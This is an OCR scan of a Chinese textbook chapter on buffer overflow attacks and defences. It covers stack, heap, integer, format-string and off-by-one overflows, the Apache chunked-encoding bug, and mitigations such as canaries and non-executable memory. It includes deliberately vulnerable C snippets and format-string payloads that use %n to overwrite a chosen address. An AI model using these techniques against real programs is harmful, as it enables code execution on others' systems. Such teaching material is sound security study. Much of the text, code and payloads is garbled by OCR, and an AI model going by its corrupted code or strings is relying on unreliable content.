个 关于 堆 的 缓冲 区 溢出 的 教程 ,开头 写 道 :“ 基 于 Heap/BSS 的 溢出 在 如 今 的 应 用 程序 中 相 
Er id ,但 报道 很 少 。 他 注意 到 当时 的 一 些 你 护 方 法 (如 非 执 行 栈 ) 并 不 能 防止 基于 堆 的 海 
出 ,给 出 了 很 多 实例 。 

进入 21 世纪 ,利用 缓冲 区 淤 出 而 进行 传播 的 是 虫 成 为 恶意 代码 的 主流 ,2003 年 8 月 的 
冲击 波 蠕虫 就 利用 Windows 系统 的 RPC Deom 组 件 的 漏洞 肆虐 全 球 的 主机 ,造成 约 20 亿 
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美元 的 损失 。2004 年 最 主要 的 恶意 代码 事件 是 利用 Windows 系统 LSASS 漏洞 传播 的 “ 霸 
水 波 ” 系 列 蠕虫 ,我 国有 超过 138 万 个 IP 地 址 的 主机 被 感染 。 这 些 数据 表明 ,通过 系统 漏洞 
进行 广泛 传播 的 蠕虫 是 对 网 络 安全 的 巨大 威胁 ,其 中 又 以 缓冲 区 淤 出 漏洞 最 为 明显 ，。 

缓冲 区 溢出 攻击 技术 成 为 网 络 攻击 和 渗透 测试 的 主要 手段 。 下 面 的 内 容 就 缓冲 区 溢出 
攻击 的 原理 和 防范 进行 详细 的 讨论 ,并 对 各 种 操作 系统 平台 的 缓冲 区 洲 出 辅 以 实例 进行 摘 
述 , 以 加 深 读者 对 缓冲 区 溢出 攻击 原理 的 理解 。 


8.1.4 缓冲 区 溢出 的 危害 


在 计算 机 安全 领域 ,缓冲 区 洪 出 就 好 比 给 自己 的 程序 开 了 个 后 门 , 这 种 安全 隐患 是 致命 
的 。 缓 冲 区 洪 出 在 各 种 操作 系统 、 应 用 软件 中 广泛 存在 。 绥 冲 区 洲 出 攻击 ,可 以 导致 应 用 程 
TE ,系统 不 稳定 甚至 关 溃 ,程序 跳 苇 到 恶意 代码 ,控制 权 被 千 。 

目前 ,网络 与 分 布 式 系统 的 安全 中 ,能 够 广泛 利用 的 50% 以 上 都 是 缓冲 区 汶 出 。 而 组 
冲 区 溢出 中 ,最 危险 的 是 堆栈 洲 出 。 入 侵 者 能 够 利用 堆栈 洲 出 ,在 图 数 返 回 的 时 候 改 变 返回 
程序 的 地 址 ,从 而 让 其 跳 转 到 任意 地 址 ,可 能 会 使 程序 前 小 导 致 拒绝 服务 ,或 者 使 程序 跳 转 
执行 恶意 代码 ,如 得 到 shell ,然后 为 所 欲 为 。 


8.2 ZEB DC a Xii PN s PR EDT 


缓冲 区 是 程序 运行 时 ,内 存 中 一 块 连续 的 区 域 。 比 如 C 语言 中 的 数组 ,最 常见 的 是 字 
AA. BAAS C 请 言 中 其 他 变量 一 样 ,可 被 声明 为 静态 或 动态 数组 。“ 绥 冲 区 洲 出 ”就 是 
回 缓 冲 区 中 写 人 过 多 数据 ,超出 边界 导致 盗 出。 缓冲 区 洲 出 会 寻 致 系统 受到 三 方面 的 攻击 : 
导致 数据 被 修改 ,是 针对 完整 性 的 攻击 ; 守 臻 数据 不 可 获取 的 拒绝 服务 攻击 ,是 针对 可 得 性 
的 攻击 ; 导致 敏感 信息 被 获取 ,是 针对 机 密 性 的 攻击 。 攻 击 者 通过 构造 数据 并 控制 用 于 堆 
栈 缓 冲 区 洪 出 的 数据 量 , 可 以 执行 其 期 望 的 代码 。 攻 击 者 发 送 的 数据 中 包含 一 些 特殊 字 节 
码 ,攻击 成 功 后 ,这 些 二 进 制 指令 会 被 执行 。 攻 击 者 使 用 的 这 些 二 进 制 指令 称 为 Shellcode， 
这 些 Shellcode 将 和 被 攻击 进程 拥有 同等 权限 进行 运行 ,大 多 数 都 以 超级 用 户 的 权限 运行 ， 
这 样 攻 击 者 可 以 完全 控制 攻击 的 目标 主机 。 

综 上 所 述 ,缓冲 区 洲 出 攻击 一 般 分 3 个 步骤 :首先 ,加 有 漏洞 程序 的 缓冲 区 中 注 和 攻击 
字符 串 ; 其 次 ,利用 漏洞 改写 内 存 的 特定 数据 ,如 返回 地 址 ,使 程序 执行 流程 跳 转 到 预先 植 
入 的 Shellcode; 最 后 ,执行 该 Shellcode 使 攻击 者 取得 被 攻击 主机 的 控制 权 。 

缓冲 区 洲 出 攻击 技术 多 种 多 样 。 以 攻击 原理 分 类 ,可 分 为 堆 洪 出 、 栈 洪 出 ,单字 节 洲 出 
和 格式 化 字符 串 洲 出 等 ;以 攻击 方式 分 类 ,可 分 为 本 地 洲 出 和 和 远程 洲 出 。 攻 击 者 通过 绥 冲 区 
洲 出 获取 主机 的 控制 权 , 如 图 8-1 所 示 。 


8.2.1 堆栈 洲 出 攻击 技术 


如 图 8-2 所 示 ,进程 在 内 存 中 映像 被 分 为 三 个 区 域 :文本 、 数 据 和 堆栈 。 文 本 区 由 程 
序 确定 ,只 读数 据 和 存放 代码 (指令 )。 文 本 区 对 应 可 执行 文件 文本 段 ,此 区 域 通常 被 设置 
为 只 读 。 数 据 区 包含 未 初始 化 和 已 初始 化 的 数据 ,之 前 提 到 的 静态 变量 储存 在 此 区 域 中 ， 
数据 区 对 应 可 执行 文件 的 DATA-BSS 段 。 堆 栈 区 存放 动态 变量 及 函数 调用 的 现场 数据 。 
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(— 堆栈 顶端 
空 操作 指令 (NOP) 局 部 变量 空间 


攻击 音程 序 代码 


攻击 者 程序 代码 地 址 ad FF en Ca PR Be HEHE 


凋 用 函数 返回 地 址 





C——2A 堆栈 底 端 
图 8-1 通过 缓冲 区 溢出 获取 主机 的 控制 权 


< = AÉ i 


《二 一 nti 


图 8-2 ”内存 结构 





由 于 系统 程序 多 由 C 语言 编写 ,而 C 语言 编 详 副 没有 对 数组 边界 的 严格 检查 ,因此 组 
冲 区 洲 出 大 多 出 现在 C 语言 程序 中 。 下 面 程序 中 , 问 一 个 缓冲 区 填充 超 过 它 所 能 容纳 的 数 
JE Wt , 右 不 做 边界 检查 ,就 会 发 生 绥 冲 区 洲 出 。 


void function(char * src) 
{ char dest[ 16]; 
strcpy(dest, src); 
} 
/ 关 主 图 数 关 / 
nain() 
{ int i; 
char str[256]; 
for(i=0; 1«256; i++) str[1] ^» 'a'; 
function(str); 


} 


程序 中 ,数组 ste 的 大 小 (256 FDEN H WRM dest 的 大 小 (16 56780 ,导致 缓冲 区 
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ra CH p P ERE ES BRL] H A ER 2C HP HJ Je p 2E RD z: HH Ee. TE PA IE BR CR] 
用 时 ,完成 以 下 操作 ;首先 把 参数 压 和 堆栈 ;然后 向 堆栈 压 入 指令 寄存 器 的 内 容 , 作 为 返回 地 
址 (ret); 接着 将 基 址 寄存 需 Cebp) 的 内 容 放 人 堆栈 ;然后 把 当前 栈 指针 (Cesp) 复 制 至 (ebp)， 
作为 新 的 基地 址 ; 最 后 把 esp 减 去 某 一 适当 数值 ,这 是 为 本 地 变量 留 出 空间 。 调 用 函数 
function 前 后 ,堆栈 结构 如 图 8-3 所 示 。 


















| 
和 ) ass 
H 
高 地 址 ebp — 
Tal FH Bil 调用 时 调用 后 


图 8-3 ”堆栈 结构 


从 图 8-3 中 可 以 看 出 ,function PR ZI dal FH Sé Bes «ste 数组 的 内 容 (256 个 字母 "a', 即 
Ox616161) 已 经 覆盖 了 从 地 址 buf Best 到 地 址 buf dest 十 256 内 存 空间 的 所 有 原来 内 容 , 包 
括 调 用 函数 function 时 保存 的 ebp 和 ret。 这 样 ,函数 返回 时 返回 到 地 址 0x616161 ,发 生 错 
误 。 可 见 ,攻击 者 可 以 通过 缓冲 区 洲 出 改变 程序 正常 的 执行 流程 。 攻 击 者 将 一 段 Shellcode 
放 人 缓冲 区 , 履 盖 函数 返回 地 址 使 它 指向 这 段 Shellcode( 见 图 8-4) ,那么 函数 返回 时 ,程序 
会 执行 攻击 者 植 人 的 Shellcode, 攻 击 者 获取 主机 控制 权 。 如 果 被 攻击 程序 以 超级 用 户 运 
行 , 则 攻击 者 获得 超级 用 户 权 限 ,完全 控制 被 攻击 的 主机 。 

低地 址 高 地 址 





NOP-:--Shellcode 





18 wx Iri 
HB ret 








图 8-4 攻击 后 返回 地 址 
由 于 这 种 洲 出 攻击 的 攻击 字符 串 放 在 栈 中 ,因此 称 为 栈 次 出 。 
8.2.2 堆 洪 出 攻击 技术 


堆 (HEAP) 是 应 用 程序 动态 分 配 的 内 存 区 。 在 操作 系统 中 ,大 部 分 内 存 区 是 在 内 核 级 
动态 分 配 , 但 HEAP 段 由 应 用 程序 分 配 , 编 译 时 候 被 初始 化 。 非 初始 化 的 数据 段 (BSS) 存 
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放 程 序 静 态 变量 ,被 初始 化 为 零 。 因 为 缓冲 区 溢出 攻击 中 ,HEAP 段 和 BSS 段 特 性 相近 ,所 
以 下 面 提 到 的 “基于 堆 的 溢出 ”同时 包含 HEAP Efl BSS Bis HH 

大 部 分 操作 系统 中 ,HEAP 段 问 上 增长 ( 即 回 高 地 址 方 回 增长 ) ,也 就 是 说 , 奉 一 段 程序 
声明 两 个 静态 变量 ,那么 先 声明 的 变量 的 地 址 小 于 后 声明 的 变量 的 地 址 。 

下 面 是 一 段 有 漏洞 的 程序 。 


static char buffer[50]; 
static int ( * funcptr)(); 
while( * str) 

{ * buffert* = * str; 
omnee 


* funcptr(); 


TE HEMP , E EIE ia A] 8-5 所 示 。 
其 中 . buffer i F T ZA 组 ` funcptr 是 PR ZA 18 EF . 低地 址 言 地 址 


str 是 程序 从 外 部 获得 的 字符 串 。 函 数 指针 实质 是 函 -F 
TUA AO HHE. FEJT ERE IT P A h ROU Is E. in buffer[50] | funcptr 


所 以 攻击 者 能 够 覆盖 funcptr 函数 指针 的 值 。 那 么 程 
序 执行 funcptr 函数 时 ,会 跳 转 到 被 覆盖 的 地 址 的 地 8 5 ERTH 
方 继续 执行 。 石 攻击 者 构造 精确 的 填 元 数据 , 奈 能 够 
在 缓冲 区 植 人 shellcode, 使 用 shellcode AY AW ££ Hb iE 8 m funcptr, 这 时 当 funcptr 被 调用 时 ， 
shellcode 就 会 被 执行 。 
对 于 堆 , 还 有 为 一 种 攻击 。C 堵 言 中 拥有 一 个 简单 的 检验 恢复 系统 setjmp/longjmp. 
首先 在 检验 点 设 定 “setmp(mp_buf)”, 然 后 用 "longjmp(jmp_ buf. val) ”来 恢复 检验 点 。 
setimp(jmp buf) SF 15 nj AE TTE ES jmp_ buf 中 ,然后 longjmp(jmp_ buf,val) 将 
从 jmp. buf "PPR ES XE TE AY Be lot ,在 longjmp 执行 完成 后 ,程序 会 从 setjmp() 的 下 一 条 语句 处 
继续 执行 ,而 且 将 val 作为 setimp() 的 返回 值 。jmp_buf 为 全 局 变量 ,存放 在 堆 中 。jmp_ 
buf 中 保存 有 寄存 天 esi ebx.edi,ebp,esp.eip. 4 HE TE longjmp TA TH 4 ur fi jmp | buf. Ap 
么 就 能 重 写 寄 存 器 eip。 所 以 当 longjmp 恢复 了 保存 的 堆栈 栈 帧 后 ,程序 就 能 够 跳 到 指定 的 
地 方 执行 。 跳 转 地 址 既 能 在 堆栈 中 ,也 能 在 堆 中 。 


8.2.3 8E Zim d X d dix N 

VÀ 3e JN, Tut (a Je. SDE op 8 1 Ha n] VA A ON SE BE Vu h es i FPE dub H o 

1. 宽度 溢出 

客 度 洲 出 简单 ,是 因为 使 用 了 不 同 的 数据 类 型 存储 整 型 数 , 笠 试 存储 一 个 超过 变量 表示 
沁 围 的 大 数 到 变量 中 ,如 以 下 程序 所 示 。 





int lenl = 0x10000; 
short len2 = lenl; 


由 于 lenl 和 len2 852308 AS AY IP KR EAN FF len] 是 32 位 ,len2 是 16 位 ,因此 赋值 操 作 


117 


118 


浏 络 攻防 原理 及 应 用 


后 ,len2 无 法 容纳 lenl 的 全 部 位 ,造成 与 预期 不 一 样 的 结果 , 即 len2 等 于 0。 
但 是 ,并 不 是 说 不 把 长 类 型 变量 赋值 给 短 类 型 的 就 行 , 把 短 类 型 变量 赋值 给 长 类 型 也 存 
在 问题 ,如 以 下 代码 。 


short len2 = 1; 
int lenl = len2; 


执行 结果 并 不 能 使 lenl 等 于 1. 1R & Zu VE AB FR EE lenl 等 于 0xffff0001, 是 一 个 负 
数 。 因 为 当 len] 的 初始 值 等 于 0xffffffff, 当 把 short 类 型 的 len2 赋值 给 lenl ht. ASH 
它 的 低 16 位 ,从 而 造成 了 安全 问题 。 

2. 运算 溢出 

在 运算 的 过 程 中 造成 的 整 型 数 湾 出 最 和 常见 ,有 很 多 著名 漏洞 都 由 这 种 整 型 数 游 出 导致 。 
其 实 原理 很 简单 ,就 是 对 整 型 数 变 量 运算 时 没有 考虑 边界 范围 ,造成 运算 后 数值 超出 它 的 存 
储 空间 。 如 果 存 储 值 是 一 个 运算 操作 ,那么 之 后 使 用 这 个 结果 的 任何 一 部 分 程序 都 将 运行 
错误 ,因为 此 计算 结果 不 正确 ,如 下 面 代码 。 


bool func(char * userdata, short datalength) 
{ 
char * buff; 


if(datalength != strlen(userdata)) 
return false; 

datalength - datalength * 2; 

buff = malloc(datalength); 
strncpy(buff, userdata, datalength); 


} 

userdata 是 用 户 传人 的 字符 串 ,datalength 是 传人 字符 串 长 度 。func() 图 数 功 能 驶 是 首 
先 保证 用 户 传 和 的 字符 串 长 度 与 字符 串 实 际 长 度 一 样 , 然 后 分 配 一 块 2 倍 的 传人 的 字符 串 
大 小 的 缓冲 区 ,最 后 把 用 户 字 符 串 复制 到 这 个 缓冲 区 当中 。 虽 然 看 起 来 没有 安全 问题 ,实则 
不 然 , 这 里 只 考虑 了 字符 串 的 安全 要 求 ,而 没有 考虑 整 型 数 长 度 变 量 的 数据 类 型 的 表示 
范围 。 

说 得 更 明确 点 就 是 datalength * 2 以 后 可 能 会 超出 16 位 short 整 型 数 的 表示 范围 , 造 
成 datalength * 2 < datalength。 假 如 用 户 提 交 的 datalength = 0x8000, 40 R 1E 2$ f D F 
0x8000 X 2=0x10000. fH Æ 448 0x10000 赋值 给 short 类 型 变量 时 ,最 高 位 的 1 m DA di th 
而 无 法 表示 ,这 时 的 0x8000 X2= 二 0。 也 就 是 说 ,在 上 面 例子 程序 中 ,如 果 用 户 提 交 的 
datalength > 二 0x8000 ,那么 WLS 72 HE Yee HH 

3. 符号 溢出 

正如 前 面 所 提 , 整 型 数 可 分 为 有 符号 整 型 数 和 无 符号 整 型 数 ,符号 问题 也 有 可 能 引发 安 
全 隐患 。 一 般 长 度 变 量 都 使 用 无 符号 整 型 数 ,那么 如 果 忽 略 了 符号 ,进行 安全 检查 时 就 可 能 
出 现 问题 。 由 符号 引起 的 溢出 最 典型 的 是 eEye 发 现 的 Apache HTTP Server 分 块 编码 漏 
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洞 。 下 面 分析 一 下 此 漏洞 的 成 因 。 

分 块 编码 (Chunked Encoding) 方 法 是 一 种 Web 用 户 向 服务 器 提交 数据 的 传输 方式 ,在 
HTTP 1.1 协议 中 定义 。 当 服务 器 收 到 chunked 编码 的 数据 时 ,会 分 配 一 个 缓冲 区 用 来 存 
放 ,如 果 提 交 的 数据 大 小 不 确定 ,那么 客户 闪 会 用 一 个 提前 协商 好 的 分 块 大 小 加 服务 送 端 提 

Apache Jl ait SA i $e BOUE 2r ER Fig 45 Sz SR. Apache 使 用 一 个 有 符号 变量 来 存储 分 块 的 
长 度 , 男 外 还 分 配 一 个 固定 大 小 的 堆栈 缓冲 区 来 存储 分 块 数据 。 出 于 安全 方面 的 考虑 ,将 分 
块 数据 复制 到 缓冲 区 之 前 ,Apache 会 检查 分 块 长 度 , 硅 分 块 长 度 大 于 缓冲 区 长 度 , 就 最 多 复 
制 缓冲 区 长 度 的 数据 。 人 然而 在 检查 时 ,没有 把 分 块 长 度 转换 为 无 特写 数 进 行 比 较 。 所 以 ,如 
果 攻 击 者 将 分 块 长 度 设置 成 负 值 ,就 会 绕 过 以 上 安全 检查 ,Apache 会 将 一 个 超 长 (至 少 大 于 
0x80000000 字 节 ) 的 分 块 复制 到 缓冲 区 ,将 造成 缓冲 区 湾 出 。http_protocol. c 中 具体 引发 
漏洞 的 代码 如 下 。 


API EXPORT(long) ap get client block(request rec * r, char * buffer, int bufsiz) 

// 漏 洞 发 生 在 这 个 函数 里 面 ,bufsiz 是 用 户 提交 的 buffer 长 度 , 是 一 个 有 符号 的 整 型 变量 

{ 

len to read = (IT 一 > remaining > bufsiz) ? bufsiz : 工 一 > remaining; 

// 这 里 判断 bufsiz Al r- > remaining 哪个 小 , 就 用 哪个 作为 复制 字符 串 的 长 度 , 如 果 用 户 提 交 的 
buffer 长 度 即 bufsiz 超过 0x80000000 时 ,由 于 bufsiz 是 有 符号 的 整 型 数 ,因此 它 一 定 是 一 个 负数 ， 
所 以 它 就 肯定 会 小 于 rr 一 > remaining, 就 绕 过 了 安全 检查 


len read = ap bread(r—> connection -> client, buffer, len to read); 
if (len read <= 0) { 

r- > connection -> keepalive = -1; 

return — 1; 

} 

再 来 看 看 ap_bread() 函 数 的 处 理 : 


API EXPORT(int) ap bread(BUFF * fb, void * buf, int nbyte) 
{ 


memcpy(buf, fb- » inptr, nbyte); ) // 这 里 采用 memcpy 复制 缓冲 区 ,复制 长 度 是 用 户 提 交 的 
buffer 大 小 ,由 于 之 前 绕 过 了 长 度 安全 检查 ,会 发 生 缓 冲 区 溢出 


在 Windows 下 利用 此 漏洞 可 以 跳 转 到 异 蛇 的 内 存 地 址 ; 在 ap _bread() HAP. MGA 
可 通过 构造 len to read 长 度 , 利 用 memcpy 的 反 回 复制 机 制 ,实施 攻击 行为 。 


len to read = (r-> remaining > (unsigned int)bufsiz) ? bufsiz : r- » remaining; 
把 bufsiz 当 作 无 符号 的 数 ,就 没有 问题 了 。 

8.2.4 格式 化 字符 串 溢 出 攻击 扩 术 
C 语言 中 ,printf() 畏 数 癌 终 疹 输 出 右 干 任意 类 型 的 数据 ,一 般 格式 为 : 
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printf( 格 式 控制 ,输出 表 项 ) 


C 语言 提供 许多 与 printf 图 数 相 近 的 图 数 , 包 括 sprintf, fprintf, snprintf, vfprintf, 
vprintf,vsprintf 和 vsnprintf F. MRETI PEJS printf 系列 图 数 中 控制 数据 的 输出 格 
式 的 字符 串 。 与 本 文 相 关 的 格式 控制 学 符 如 表 8-1 所 示 。 

printf 系列 冰 数 被 调用 时 ,从 格式 字符 串 中 依次 读 取 字符 ,直到 格式 化 字符 时 ,就 按 其 
从 输出 表 项 对 应 的 变量 中 谈 取 数据 ,再 按照 控制 字符 所 规定 的 格式 输出 。 

表 8-1 与 本 文 相关 的 格式 控制 字符 


%d 用 十 进 制 输出 整数 输出 的 字符 数 写 人 变量 
Vx | a TEA 





Vu 以 十 进 制 输出 无 符号 整数 | | 


“%n" 是 把 已 经 输出 的 字符 串 长 度 写 到 指定 的 内 存 变量 。“%n” 一 般 很 少 用 到 ,但 一 些 
大 型 程序 中 ,由 于 运行 复杂 ,经 常 需要 使 用 它 获取 当前 输出 的 字符 数 ， 

E printf 中 的 输出 表 项 个 数 大 于 格式 化 字符 ,多余 的 输出 表 项 会 被 忽略 ;如 果 小 于 格式 
化 字符 ,那么 prin 将 从 输出 表 项 下 一 个 内 存单 元 为 剩 下 的 格式 控制 字符 读 取 数据 。 例 如 ， 


printf("$d, $d, $d,",1,2); 


当 执 行 这 条 语句 时 ,堆栈 情况 如 图 8-6 所 示 。 可 以 看 
出 ,格式 化 字 和 从 串 的 地 址 和 输出 表 项 依次 锌 存放 在 堆栈 
中 ,printf 函数 依次 从 输出 表 项 谱 取 数据 并 和 输出。 第 3 个 
“%d”, 读 到 的 数据 是 图 中 “dump” 内 存单 元 的 值 。 厂 将 
“%d” 换 成 “%n”, 这 时 如 果 “dump” 的 值 为 有 效 地 址 , 那 


输出 表 项 1 m ep VP AN iei 
cao 会 以 它 为 地 址 的 内 存单 元 会 被 改写 为 printf 函数 所 输出 


的 字符 串 长 度 。 

可 见 ,利用 printf 函数 能 够 改写 内 存 。 

printf 图 数 参 数 个 数 是 可 以 改变 的 , 除 六 格式 控制 ” 

图 8-6 print 函数 调用 时 的 内 存 “是 必需 之 外 ,输出 表 项 可 以 没有 。 
右 没 有 输出 表 项 ,那么 格 却 控 制 字 符 串 中 不 应 该 含 

有 格式 控制 符 。 但 如 果 此 格式 控制 字符 串 来 自 外 部 输入 ,就 不 能 够 保证 其 中 不 含有 格式 控 

若 果 采用 “printf(str)” 代 替 “printf("%s"，str)”, 这 里 的 字符 串 如 果 来 自 外 部 输入 , 攻 
击 者 就 可 以 利用 它 ,修改 内 存 执行 任意 代码 。 

青 看 一 段 代码 : 





char str[80]; 
snprintf(str, 80, format); 


第 8 章 缓冲 区 溢出 攻击 与 防 


format 是 来 月 外 部 输入 的 字符 串 ,这 里 省 略 了 输出 表 项 。snprintf PR ZI SR De] H1 IS] ,堆栈 
的 情况 如 图 8-7 所 示 。 可 以 看 出 ,此 时 堆栈 中 依次 存放 函数 参数 .20 FT 26 2 CS RF 


数组 str。 如 果 format 字符 串 包 含 足够 多 的 格式 化 控制 字符 ， 
snprintf 图 数 会 从 堆栈 中 依次 读 取 数据 作为 格式 控制 符 的 输 
出 值 ,snprintf 函数 就 有 可 能 一 和 卫 读 到 字 和 从 数组 stro X F 
“%n”, 将 已 经 输出 的 字符 个 数 写 到 已 读 到 数据 作为 地 址 的 内 
存单 元 中 。 输 出 字符 的 个 数 是 字符 串 应 该 输出 的 字符 个 数 ， 
而 不 是 实际 输出 的 字符 个 数 。 也 就 是 说 ,即使 程序 中 限定 了 
输出 字符 串 长 度 ,攻击 者 依然 可 以 利用 类 似 “%. mU" CR m 
为 一 整数 值 ) 的 格式 控制 符 得 到 随意 大 小 的 输出 字符 的 个 数 。 
因此 ,攻击 者 能 够 利用 此 漏洞 修改 任意 内 存 。 

针对 以 上 代码 ,可 以 在 format 开始 放 人 要 改写 的 内 存 地 
ht ,然后 使 用 5 个 “%X” 跳 过 20 字 节 无 关 数 据 。snprintf 处 理 
format 字符 串 的 时 候 , 首 先 将 format 中 放 和 人 的 内 存 地 址 复制 
到 str 数组 ,然后 根据 格式 化 控制 符 从 堆栈 中 读 取 数据。 如 宁 
在 format 中 再 加 上 一 个 “%n”, 那 么 当前 输出 的 字符 个 数 会 被 
Ej AE format 中 预 设 的 地 址 中 。 


CEN 
[me 
[we 
ELEM 
[ELIT 
ELM 
[wwe 





图 8-7  snprint 图 数 调 用 时 
的 内 存 


例如 ,要 在 OxbffffbeO FS A 0x10204080, 可 以 使 用 这 样 的 format 串 : 


"\xe0\xfb\xff}c6faaaa\xel\xfb\ }cff}xbfaaaa\xe2\xfb\xf }xbfaaaa\xe3\xfb\xf}bf +x%x%x%x% 


68u $ n $ 192u $ n% 224u $ n $ 240u $ n" 


aaaa 是 用 来 填充 的 ,没有 意义 。 数 据 的 写 人 通过 如 图 8-8 所 示 的 4 个 步骤 完成 。 


CC NE 





TE 
EE 
seus -[[e[xIe[o[wIsIs]- 
eee OE oa] 





8-8 ”改写 内 存 步 又 


每 步 与 入 情况 如 下 。 

(1) 在 0xbffffbe0 P A 0x00000080。 
(2) 在 Oxbffffbel 中 写 人 0x00000140, 
(3) 在 Oxbffffbe2 中 写 人 0x00000220, 
(4) 在 Oxbffffbe3 中 写 人 0x00000310, 
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写 人 一 个 确定 的 数 , 每 一 步 写 人 的 数值 是 上 一 步 已 经 输出 的 字符 串 个 数 与 增加 的 
输出 字符 的 个 数 之 和 。 对 于 给 定 的 要 写 人 的 数 , 计 算 每 步 需 要 增加 的 字符 的 个 数 算 法 
如 下 。 


write byte += 0x100; 
already written % = 0x100; 
padding = (write byte- already written) % 0x100; 
if (padding < 10) 
padding += 0x100; 


"write byte’ #25 AL BJ B. "already. written" E O i HAY FTF XX “padding” 228 Jn 
的 输出 字符 的 个 效 。 

以 上 构造 的 格式 化 字符 串 较 元 长 ,可 以 采用 由 “数字 十 '$ ”表示 的 直接 参数 存 取 简化 构 
i, Pia: 


printf (" & 552 d\n", 5, 4, 3 2 1); 


输出 结 来 是 1, 其 中 “5$ ”指定 卫 接 和 存 取 输出 表 项 中 的 第 5 个 参数 。 
由 此 ,上 面 的 格式 化 学 符 串 可 以 全 化 为 : 


"\xe0}fb\xff}cbf\xel\xfb\xff}cbf\xe2\xfb}ff}xb H e3\ofb\xffVcbf % 112u%6$n%2 
08u%7$n% 336u%8S$n% 448u%95 n" 


上 面 两 个 格式 化 字符 串 使 用 的 都 是 每 次 写 人 一 个 字 节 的 方法 ,还 能 够 再 简化 ,每 次 写 人 
2 fe pq. 

综 上 所 述 ,要 利用 此 漏洞 ,可 先 在 程序 中 植 和 人 Shellcode ,再 利用 格式 化 字符 串 的 漏洞 修 
HC eR ROR [n Hk 7j Shellcode 的 地 址 ,那么 当 程 序 返 回 时 ,就 会 执行 Shellcode。 
8.2.5 HS SED i d iix 

一 般 的 缓冲 区 溢出 攻击 ,会 要 求 有 漏洞 的 程序 可 以 多 写 人 一 定 长 度 的 数据 (一 般 至 少 8 
个 字 节 )。 但 是 有 种 情况 , 仅 允 许 洲 出 一 个 字 节 ,如 由 于 程序 员 的 玖 忽 会 多 许 输入 多 于 角 冲 
区 一 个 字 节 的 数据 。 这 时 ,就 需要 采取 一 种 特殊 的 缓冲 区 溢出 攻击 的 方法 , 即 单 学 市 溢出 


技术 。 
下 面 提 供 一 个 有 此 汤 洞 的 一 段 程序 。 


int i; 

char buff[256]; 

for(i=0; i<=256; i++) 
buff[i] = sm[i]; 


如 上 ,最 多 只 可 以 输入 257 个 字 节 到 一 个 256 个 字 厄 的 缓冲 区 中 ,也 就 是 说 ,只 能 多 和 堆 
盖 堆 栈 中 一 个 宇 节 。 不 过 在 一 是 条 件 下 , 仅 利 用 这 一 个 宇 节 就 可 以 在 被 攻击 主机 上 执行 攻 
击 者 的 任意 代码 。 
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如 图 8-9 所 示 , 当 执行 call 指令 时 ,进程 首先 将 %eip PI% ebp 压 入 堆栈 ;然后 将 当前 堆 
栈 地 址 复制 到 %ebp 中 ,再 为 局 部 变量 分 配 空间 ; 整 型 变量 i 占 4 个 字 节 ,buffl ] 占 256 AF 
节 (0x100), 因 而 %esp 减少 0x104。 可 见 , 被 覆盖 的 一 个 字 节 应 该 是 压 入 堆栈 的 %ebp 值 的 
RFT. 

调用 结束 时 , %ebp 会 被 复制 到 %esp 中 ;然后 %ebp 再 从 堆栈 中 恢复 。 由 此 可 见 , 可 以 
改变 %ebp 的 值 ,但 只 能 修改 %ebp 的 最 后 一 个 字 广 ,造成 安全 隐 趾 。 

当 进 程 从 一 个 函数 返回 时 ,%ebp 中 的 值 复制 到 %esp 中 作为 新 的 堆栈 指针 ,进程 从 堆 
栈 中 弹出 保存 的 ebp 到 %ebp 中 ,这 时 %ebp 的 值 是 通过 覆盖 改写 的 ebp。 然 后 继续 弹出 保 
存 的 eip A|% eip 中 ,继续 执行 。 

当 程 序 返回 到 上 一 层 调 用 时 ,被 修改 的 %ebp 的 值 被 复制 到 % esp 中 作为 新 的 堆栈 指 
针 , 这 时 堆栈 指针 的 位 置 已 被 改变 。 然 后 ,程序 将 按照 被 改变 的 %esp 值 弹出 %ebp 和 
%eip ,再 从 %eip 处 继续 执行 。 

如 图 8-10 所 示 ,在 缓冲 区 中 存放 Shellcode 及 伪造 的 上 层 图 数 返 回 地 址 ,此 地 址 指 回 
Shellcode。 然 后 用 一 个 字 节 覆盖 已 保存 的 ebp 的 低 字 节 ,这 个 字 节 一 定 要 小 于 它 原 来 的 值 ， 
这 样 修改 的 值 就 有 可 能 指 癌 缓冲 区 内 放置 的 伪造 的 返回 地 址 以 前 4 A6 o B) E. JD A 
上 层 函 数 返 回 时 ,进程 就 会 跳 转 到 Shellcode 处 继续 执行 。 







mE 
res 
你 存 的 sip 保存 的 ebp 
上 层 函 数 的 栈 帧 | Hu 保存 的 ret | RK 
图 8-9 在 堆栈 中 存放 数据 图 8-10 MS ebp 的 低 字 节 


8.3. 溢出 保护 技术 


洲 出 保护 技术 需要 注意 以 下 几 方 面 。 

(1) 要 求 程序 设计 着 编写 正确 的 代码 。 通 过 学 习 安 全 编程 .进行 软件 质量 控制 .使 用 源 
码 级 纠 错 工具 达到 目标 。 

(2) 选择 合适 的 编译 器 。 进 行 数 组 边界 检查 。 编 译 时 加 入 条 件 , 如 canary 保护 、 
StackGuard 思想 Stack Cookie =, 

(3) 选择 合适 的 编程 语言。C/VC++ 出 于 效率 的 考虑 ,不 检查 数组 的 边界 ,这 是 培 言 的 固 
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(4) RunTime 保护 。 可 以 进行 二 进 制 地 址 重 写 ,Hook See ar PR BSE FR OK 

(5) 操 作 系 统 层 面 。 可 以 采用 非 执 行 缓 冲 区 技术 。 绥 冲 区 是 存放 数据 的 地 方 , 可 以 在 便 
件 或 操作 系统 层次 上 强制 缓冲 区 的 内 容 不 可 执行 。 许 多 内 核 补丁 都 可 以 用 来 阻止 缓冲 区 执 
行 。 下 面 举例 说 明 。 

堆栈 不 可 执行 内 核 补 丁 : Solar designer' s nonexec kernel patch; Solaris/SPARC 
nonexec-stack protection 。 

© 数据 段 不 可 执行 内 核 补 丁 : kNoX (Linux 内 核 补 丁 , 仅 支持 2.2 内 核 ); RSX(Linux 
内 核 模块 ); Exec shield, 

增强 的 绥 冲 区 游 出 保护 及 内 核 MAC: OpenBSD security feature; PaX。 

(6) 便 件 。X86 CPU 上 及 用 4GB 平坦 模式 ,数据 段 和 代码 段 的 线性 地 址 是 重合 的 ,页 
面 只 要 可 读 就 可 以 执行 ,诸多 内 核 补 丁 才 会 费 尽 心机 设计 了 各 种 方法 来 使 数据 段 不 可 执行 。 
Alpha, PPC, PA-RISC, SPARC,SPARC64,AMD64,1A64 都 提供 了 页 执行 bit fz. Intel 及 
AMD 新 增加 的 页 执行 bit AMERI NX 安全 技术 。Windows XP SP2 及 Linux Kernel 2. 6 都 
xd NX. 


8.4 RURE ti HA XC dd HILOS ol 


8.4.1 缓冲 区 攻击 实例 For Windows 


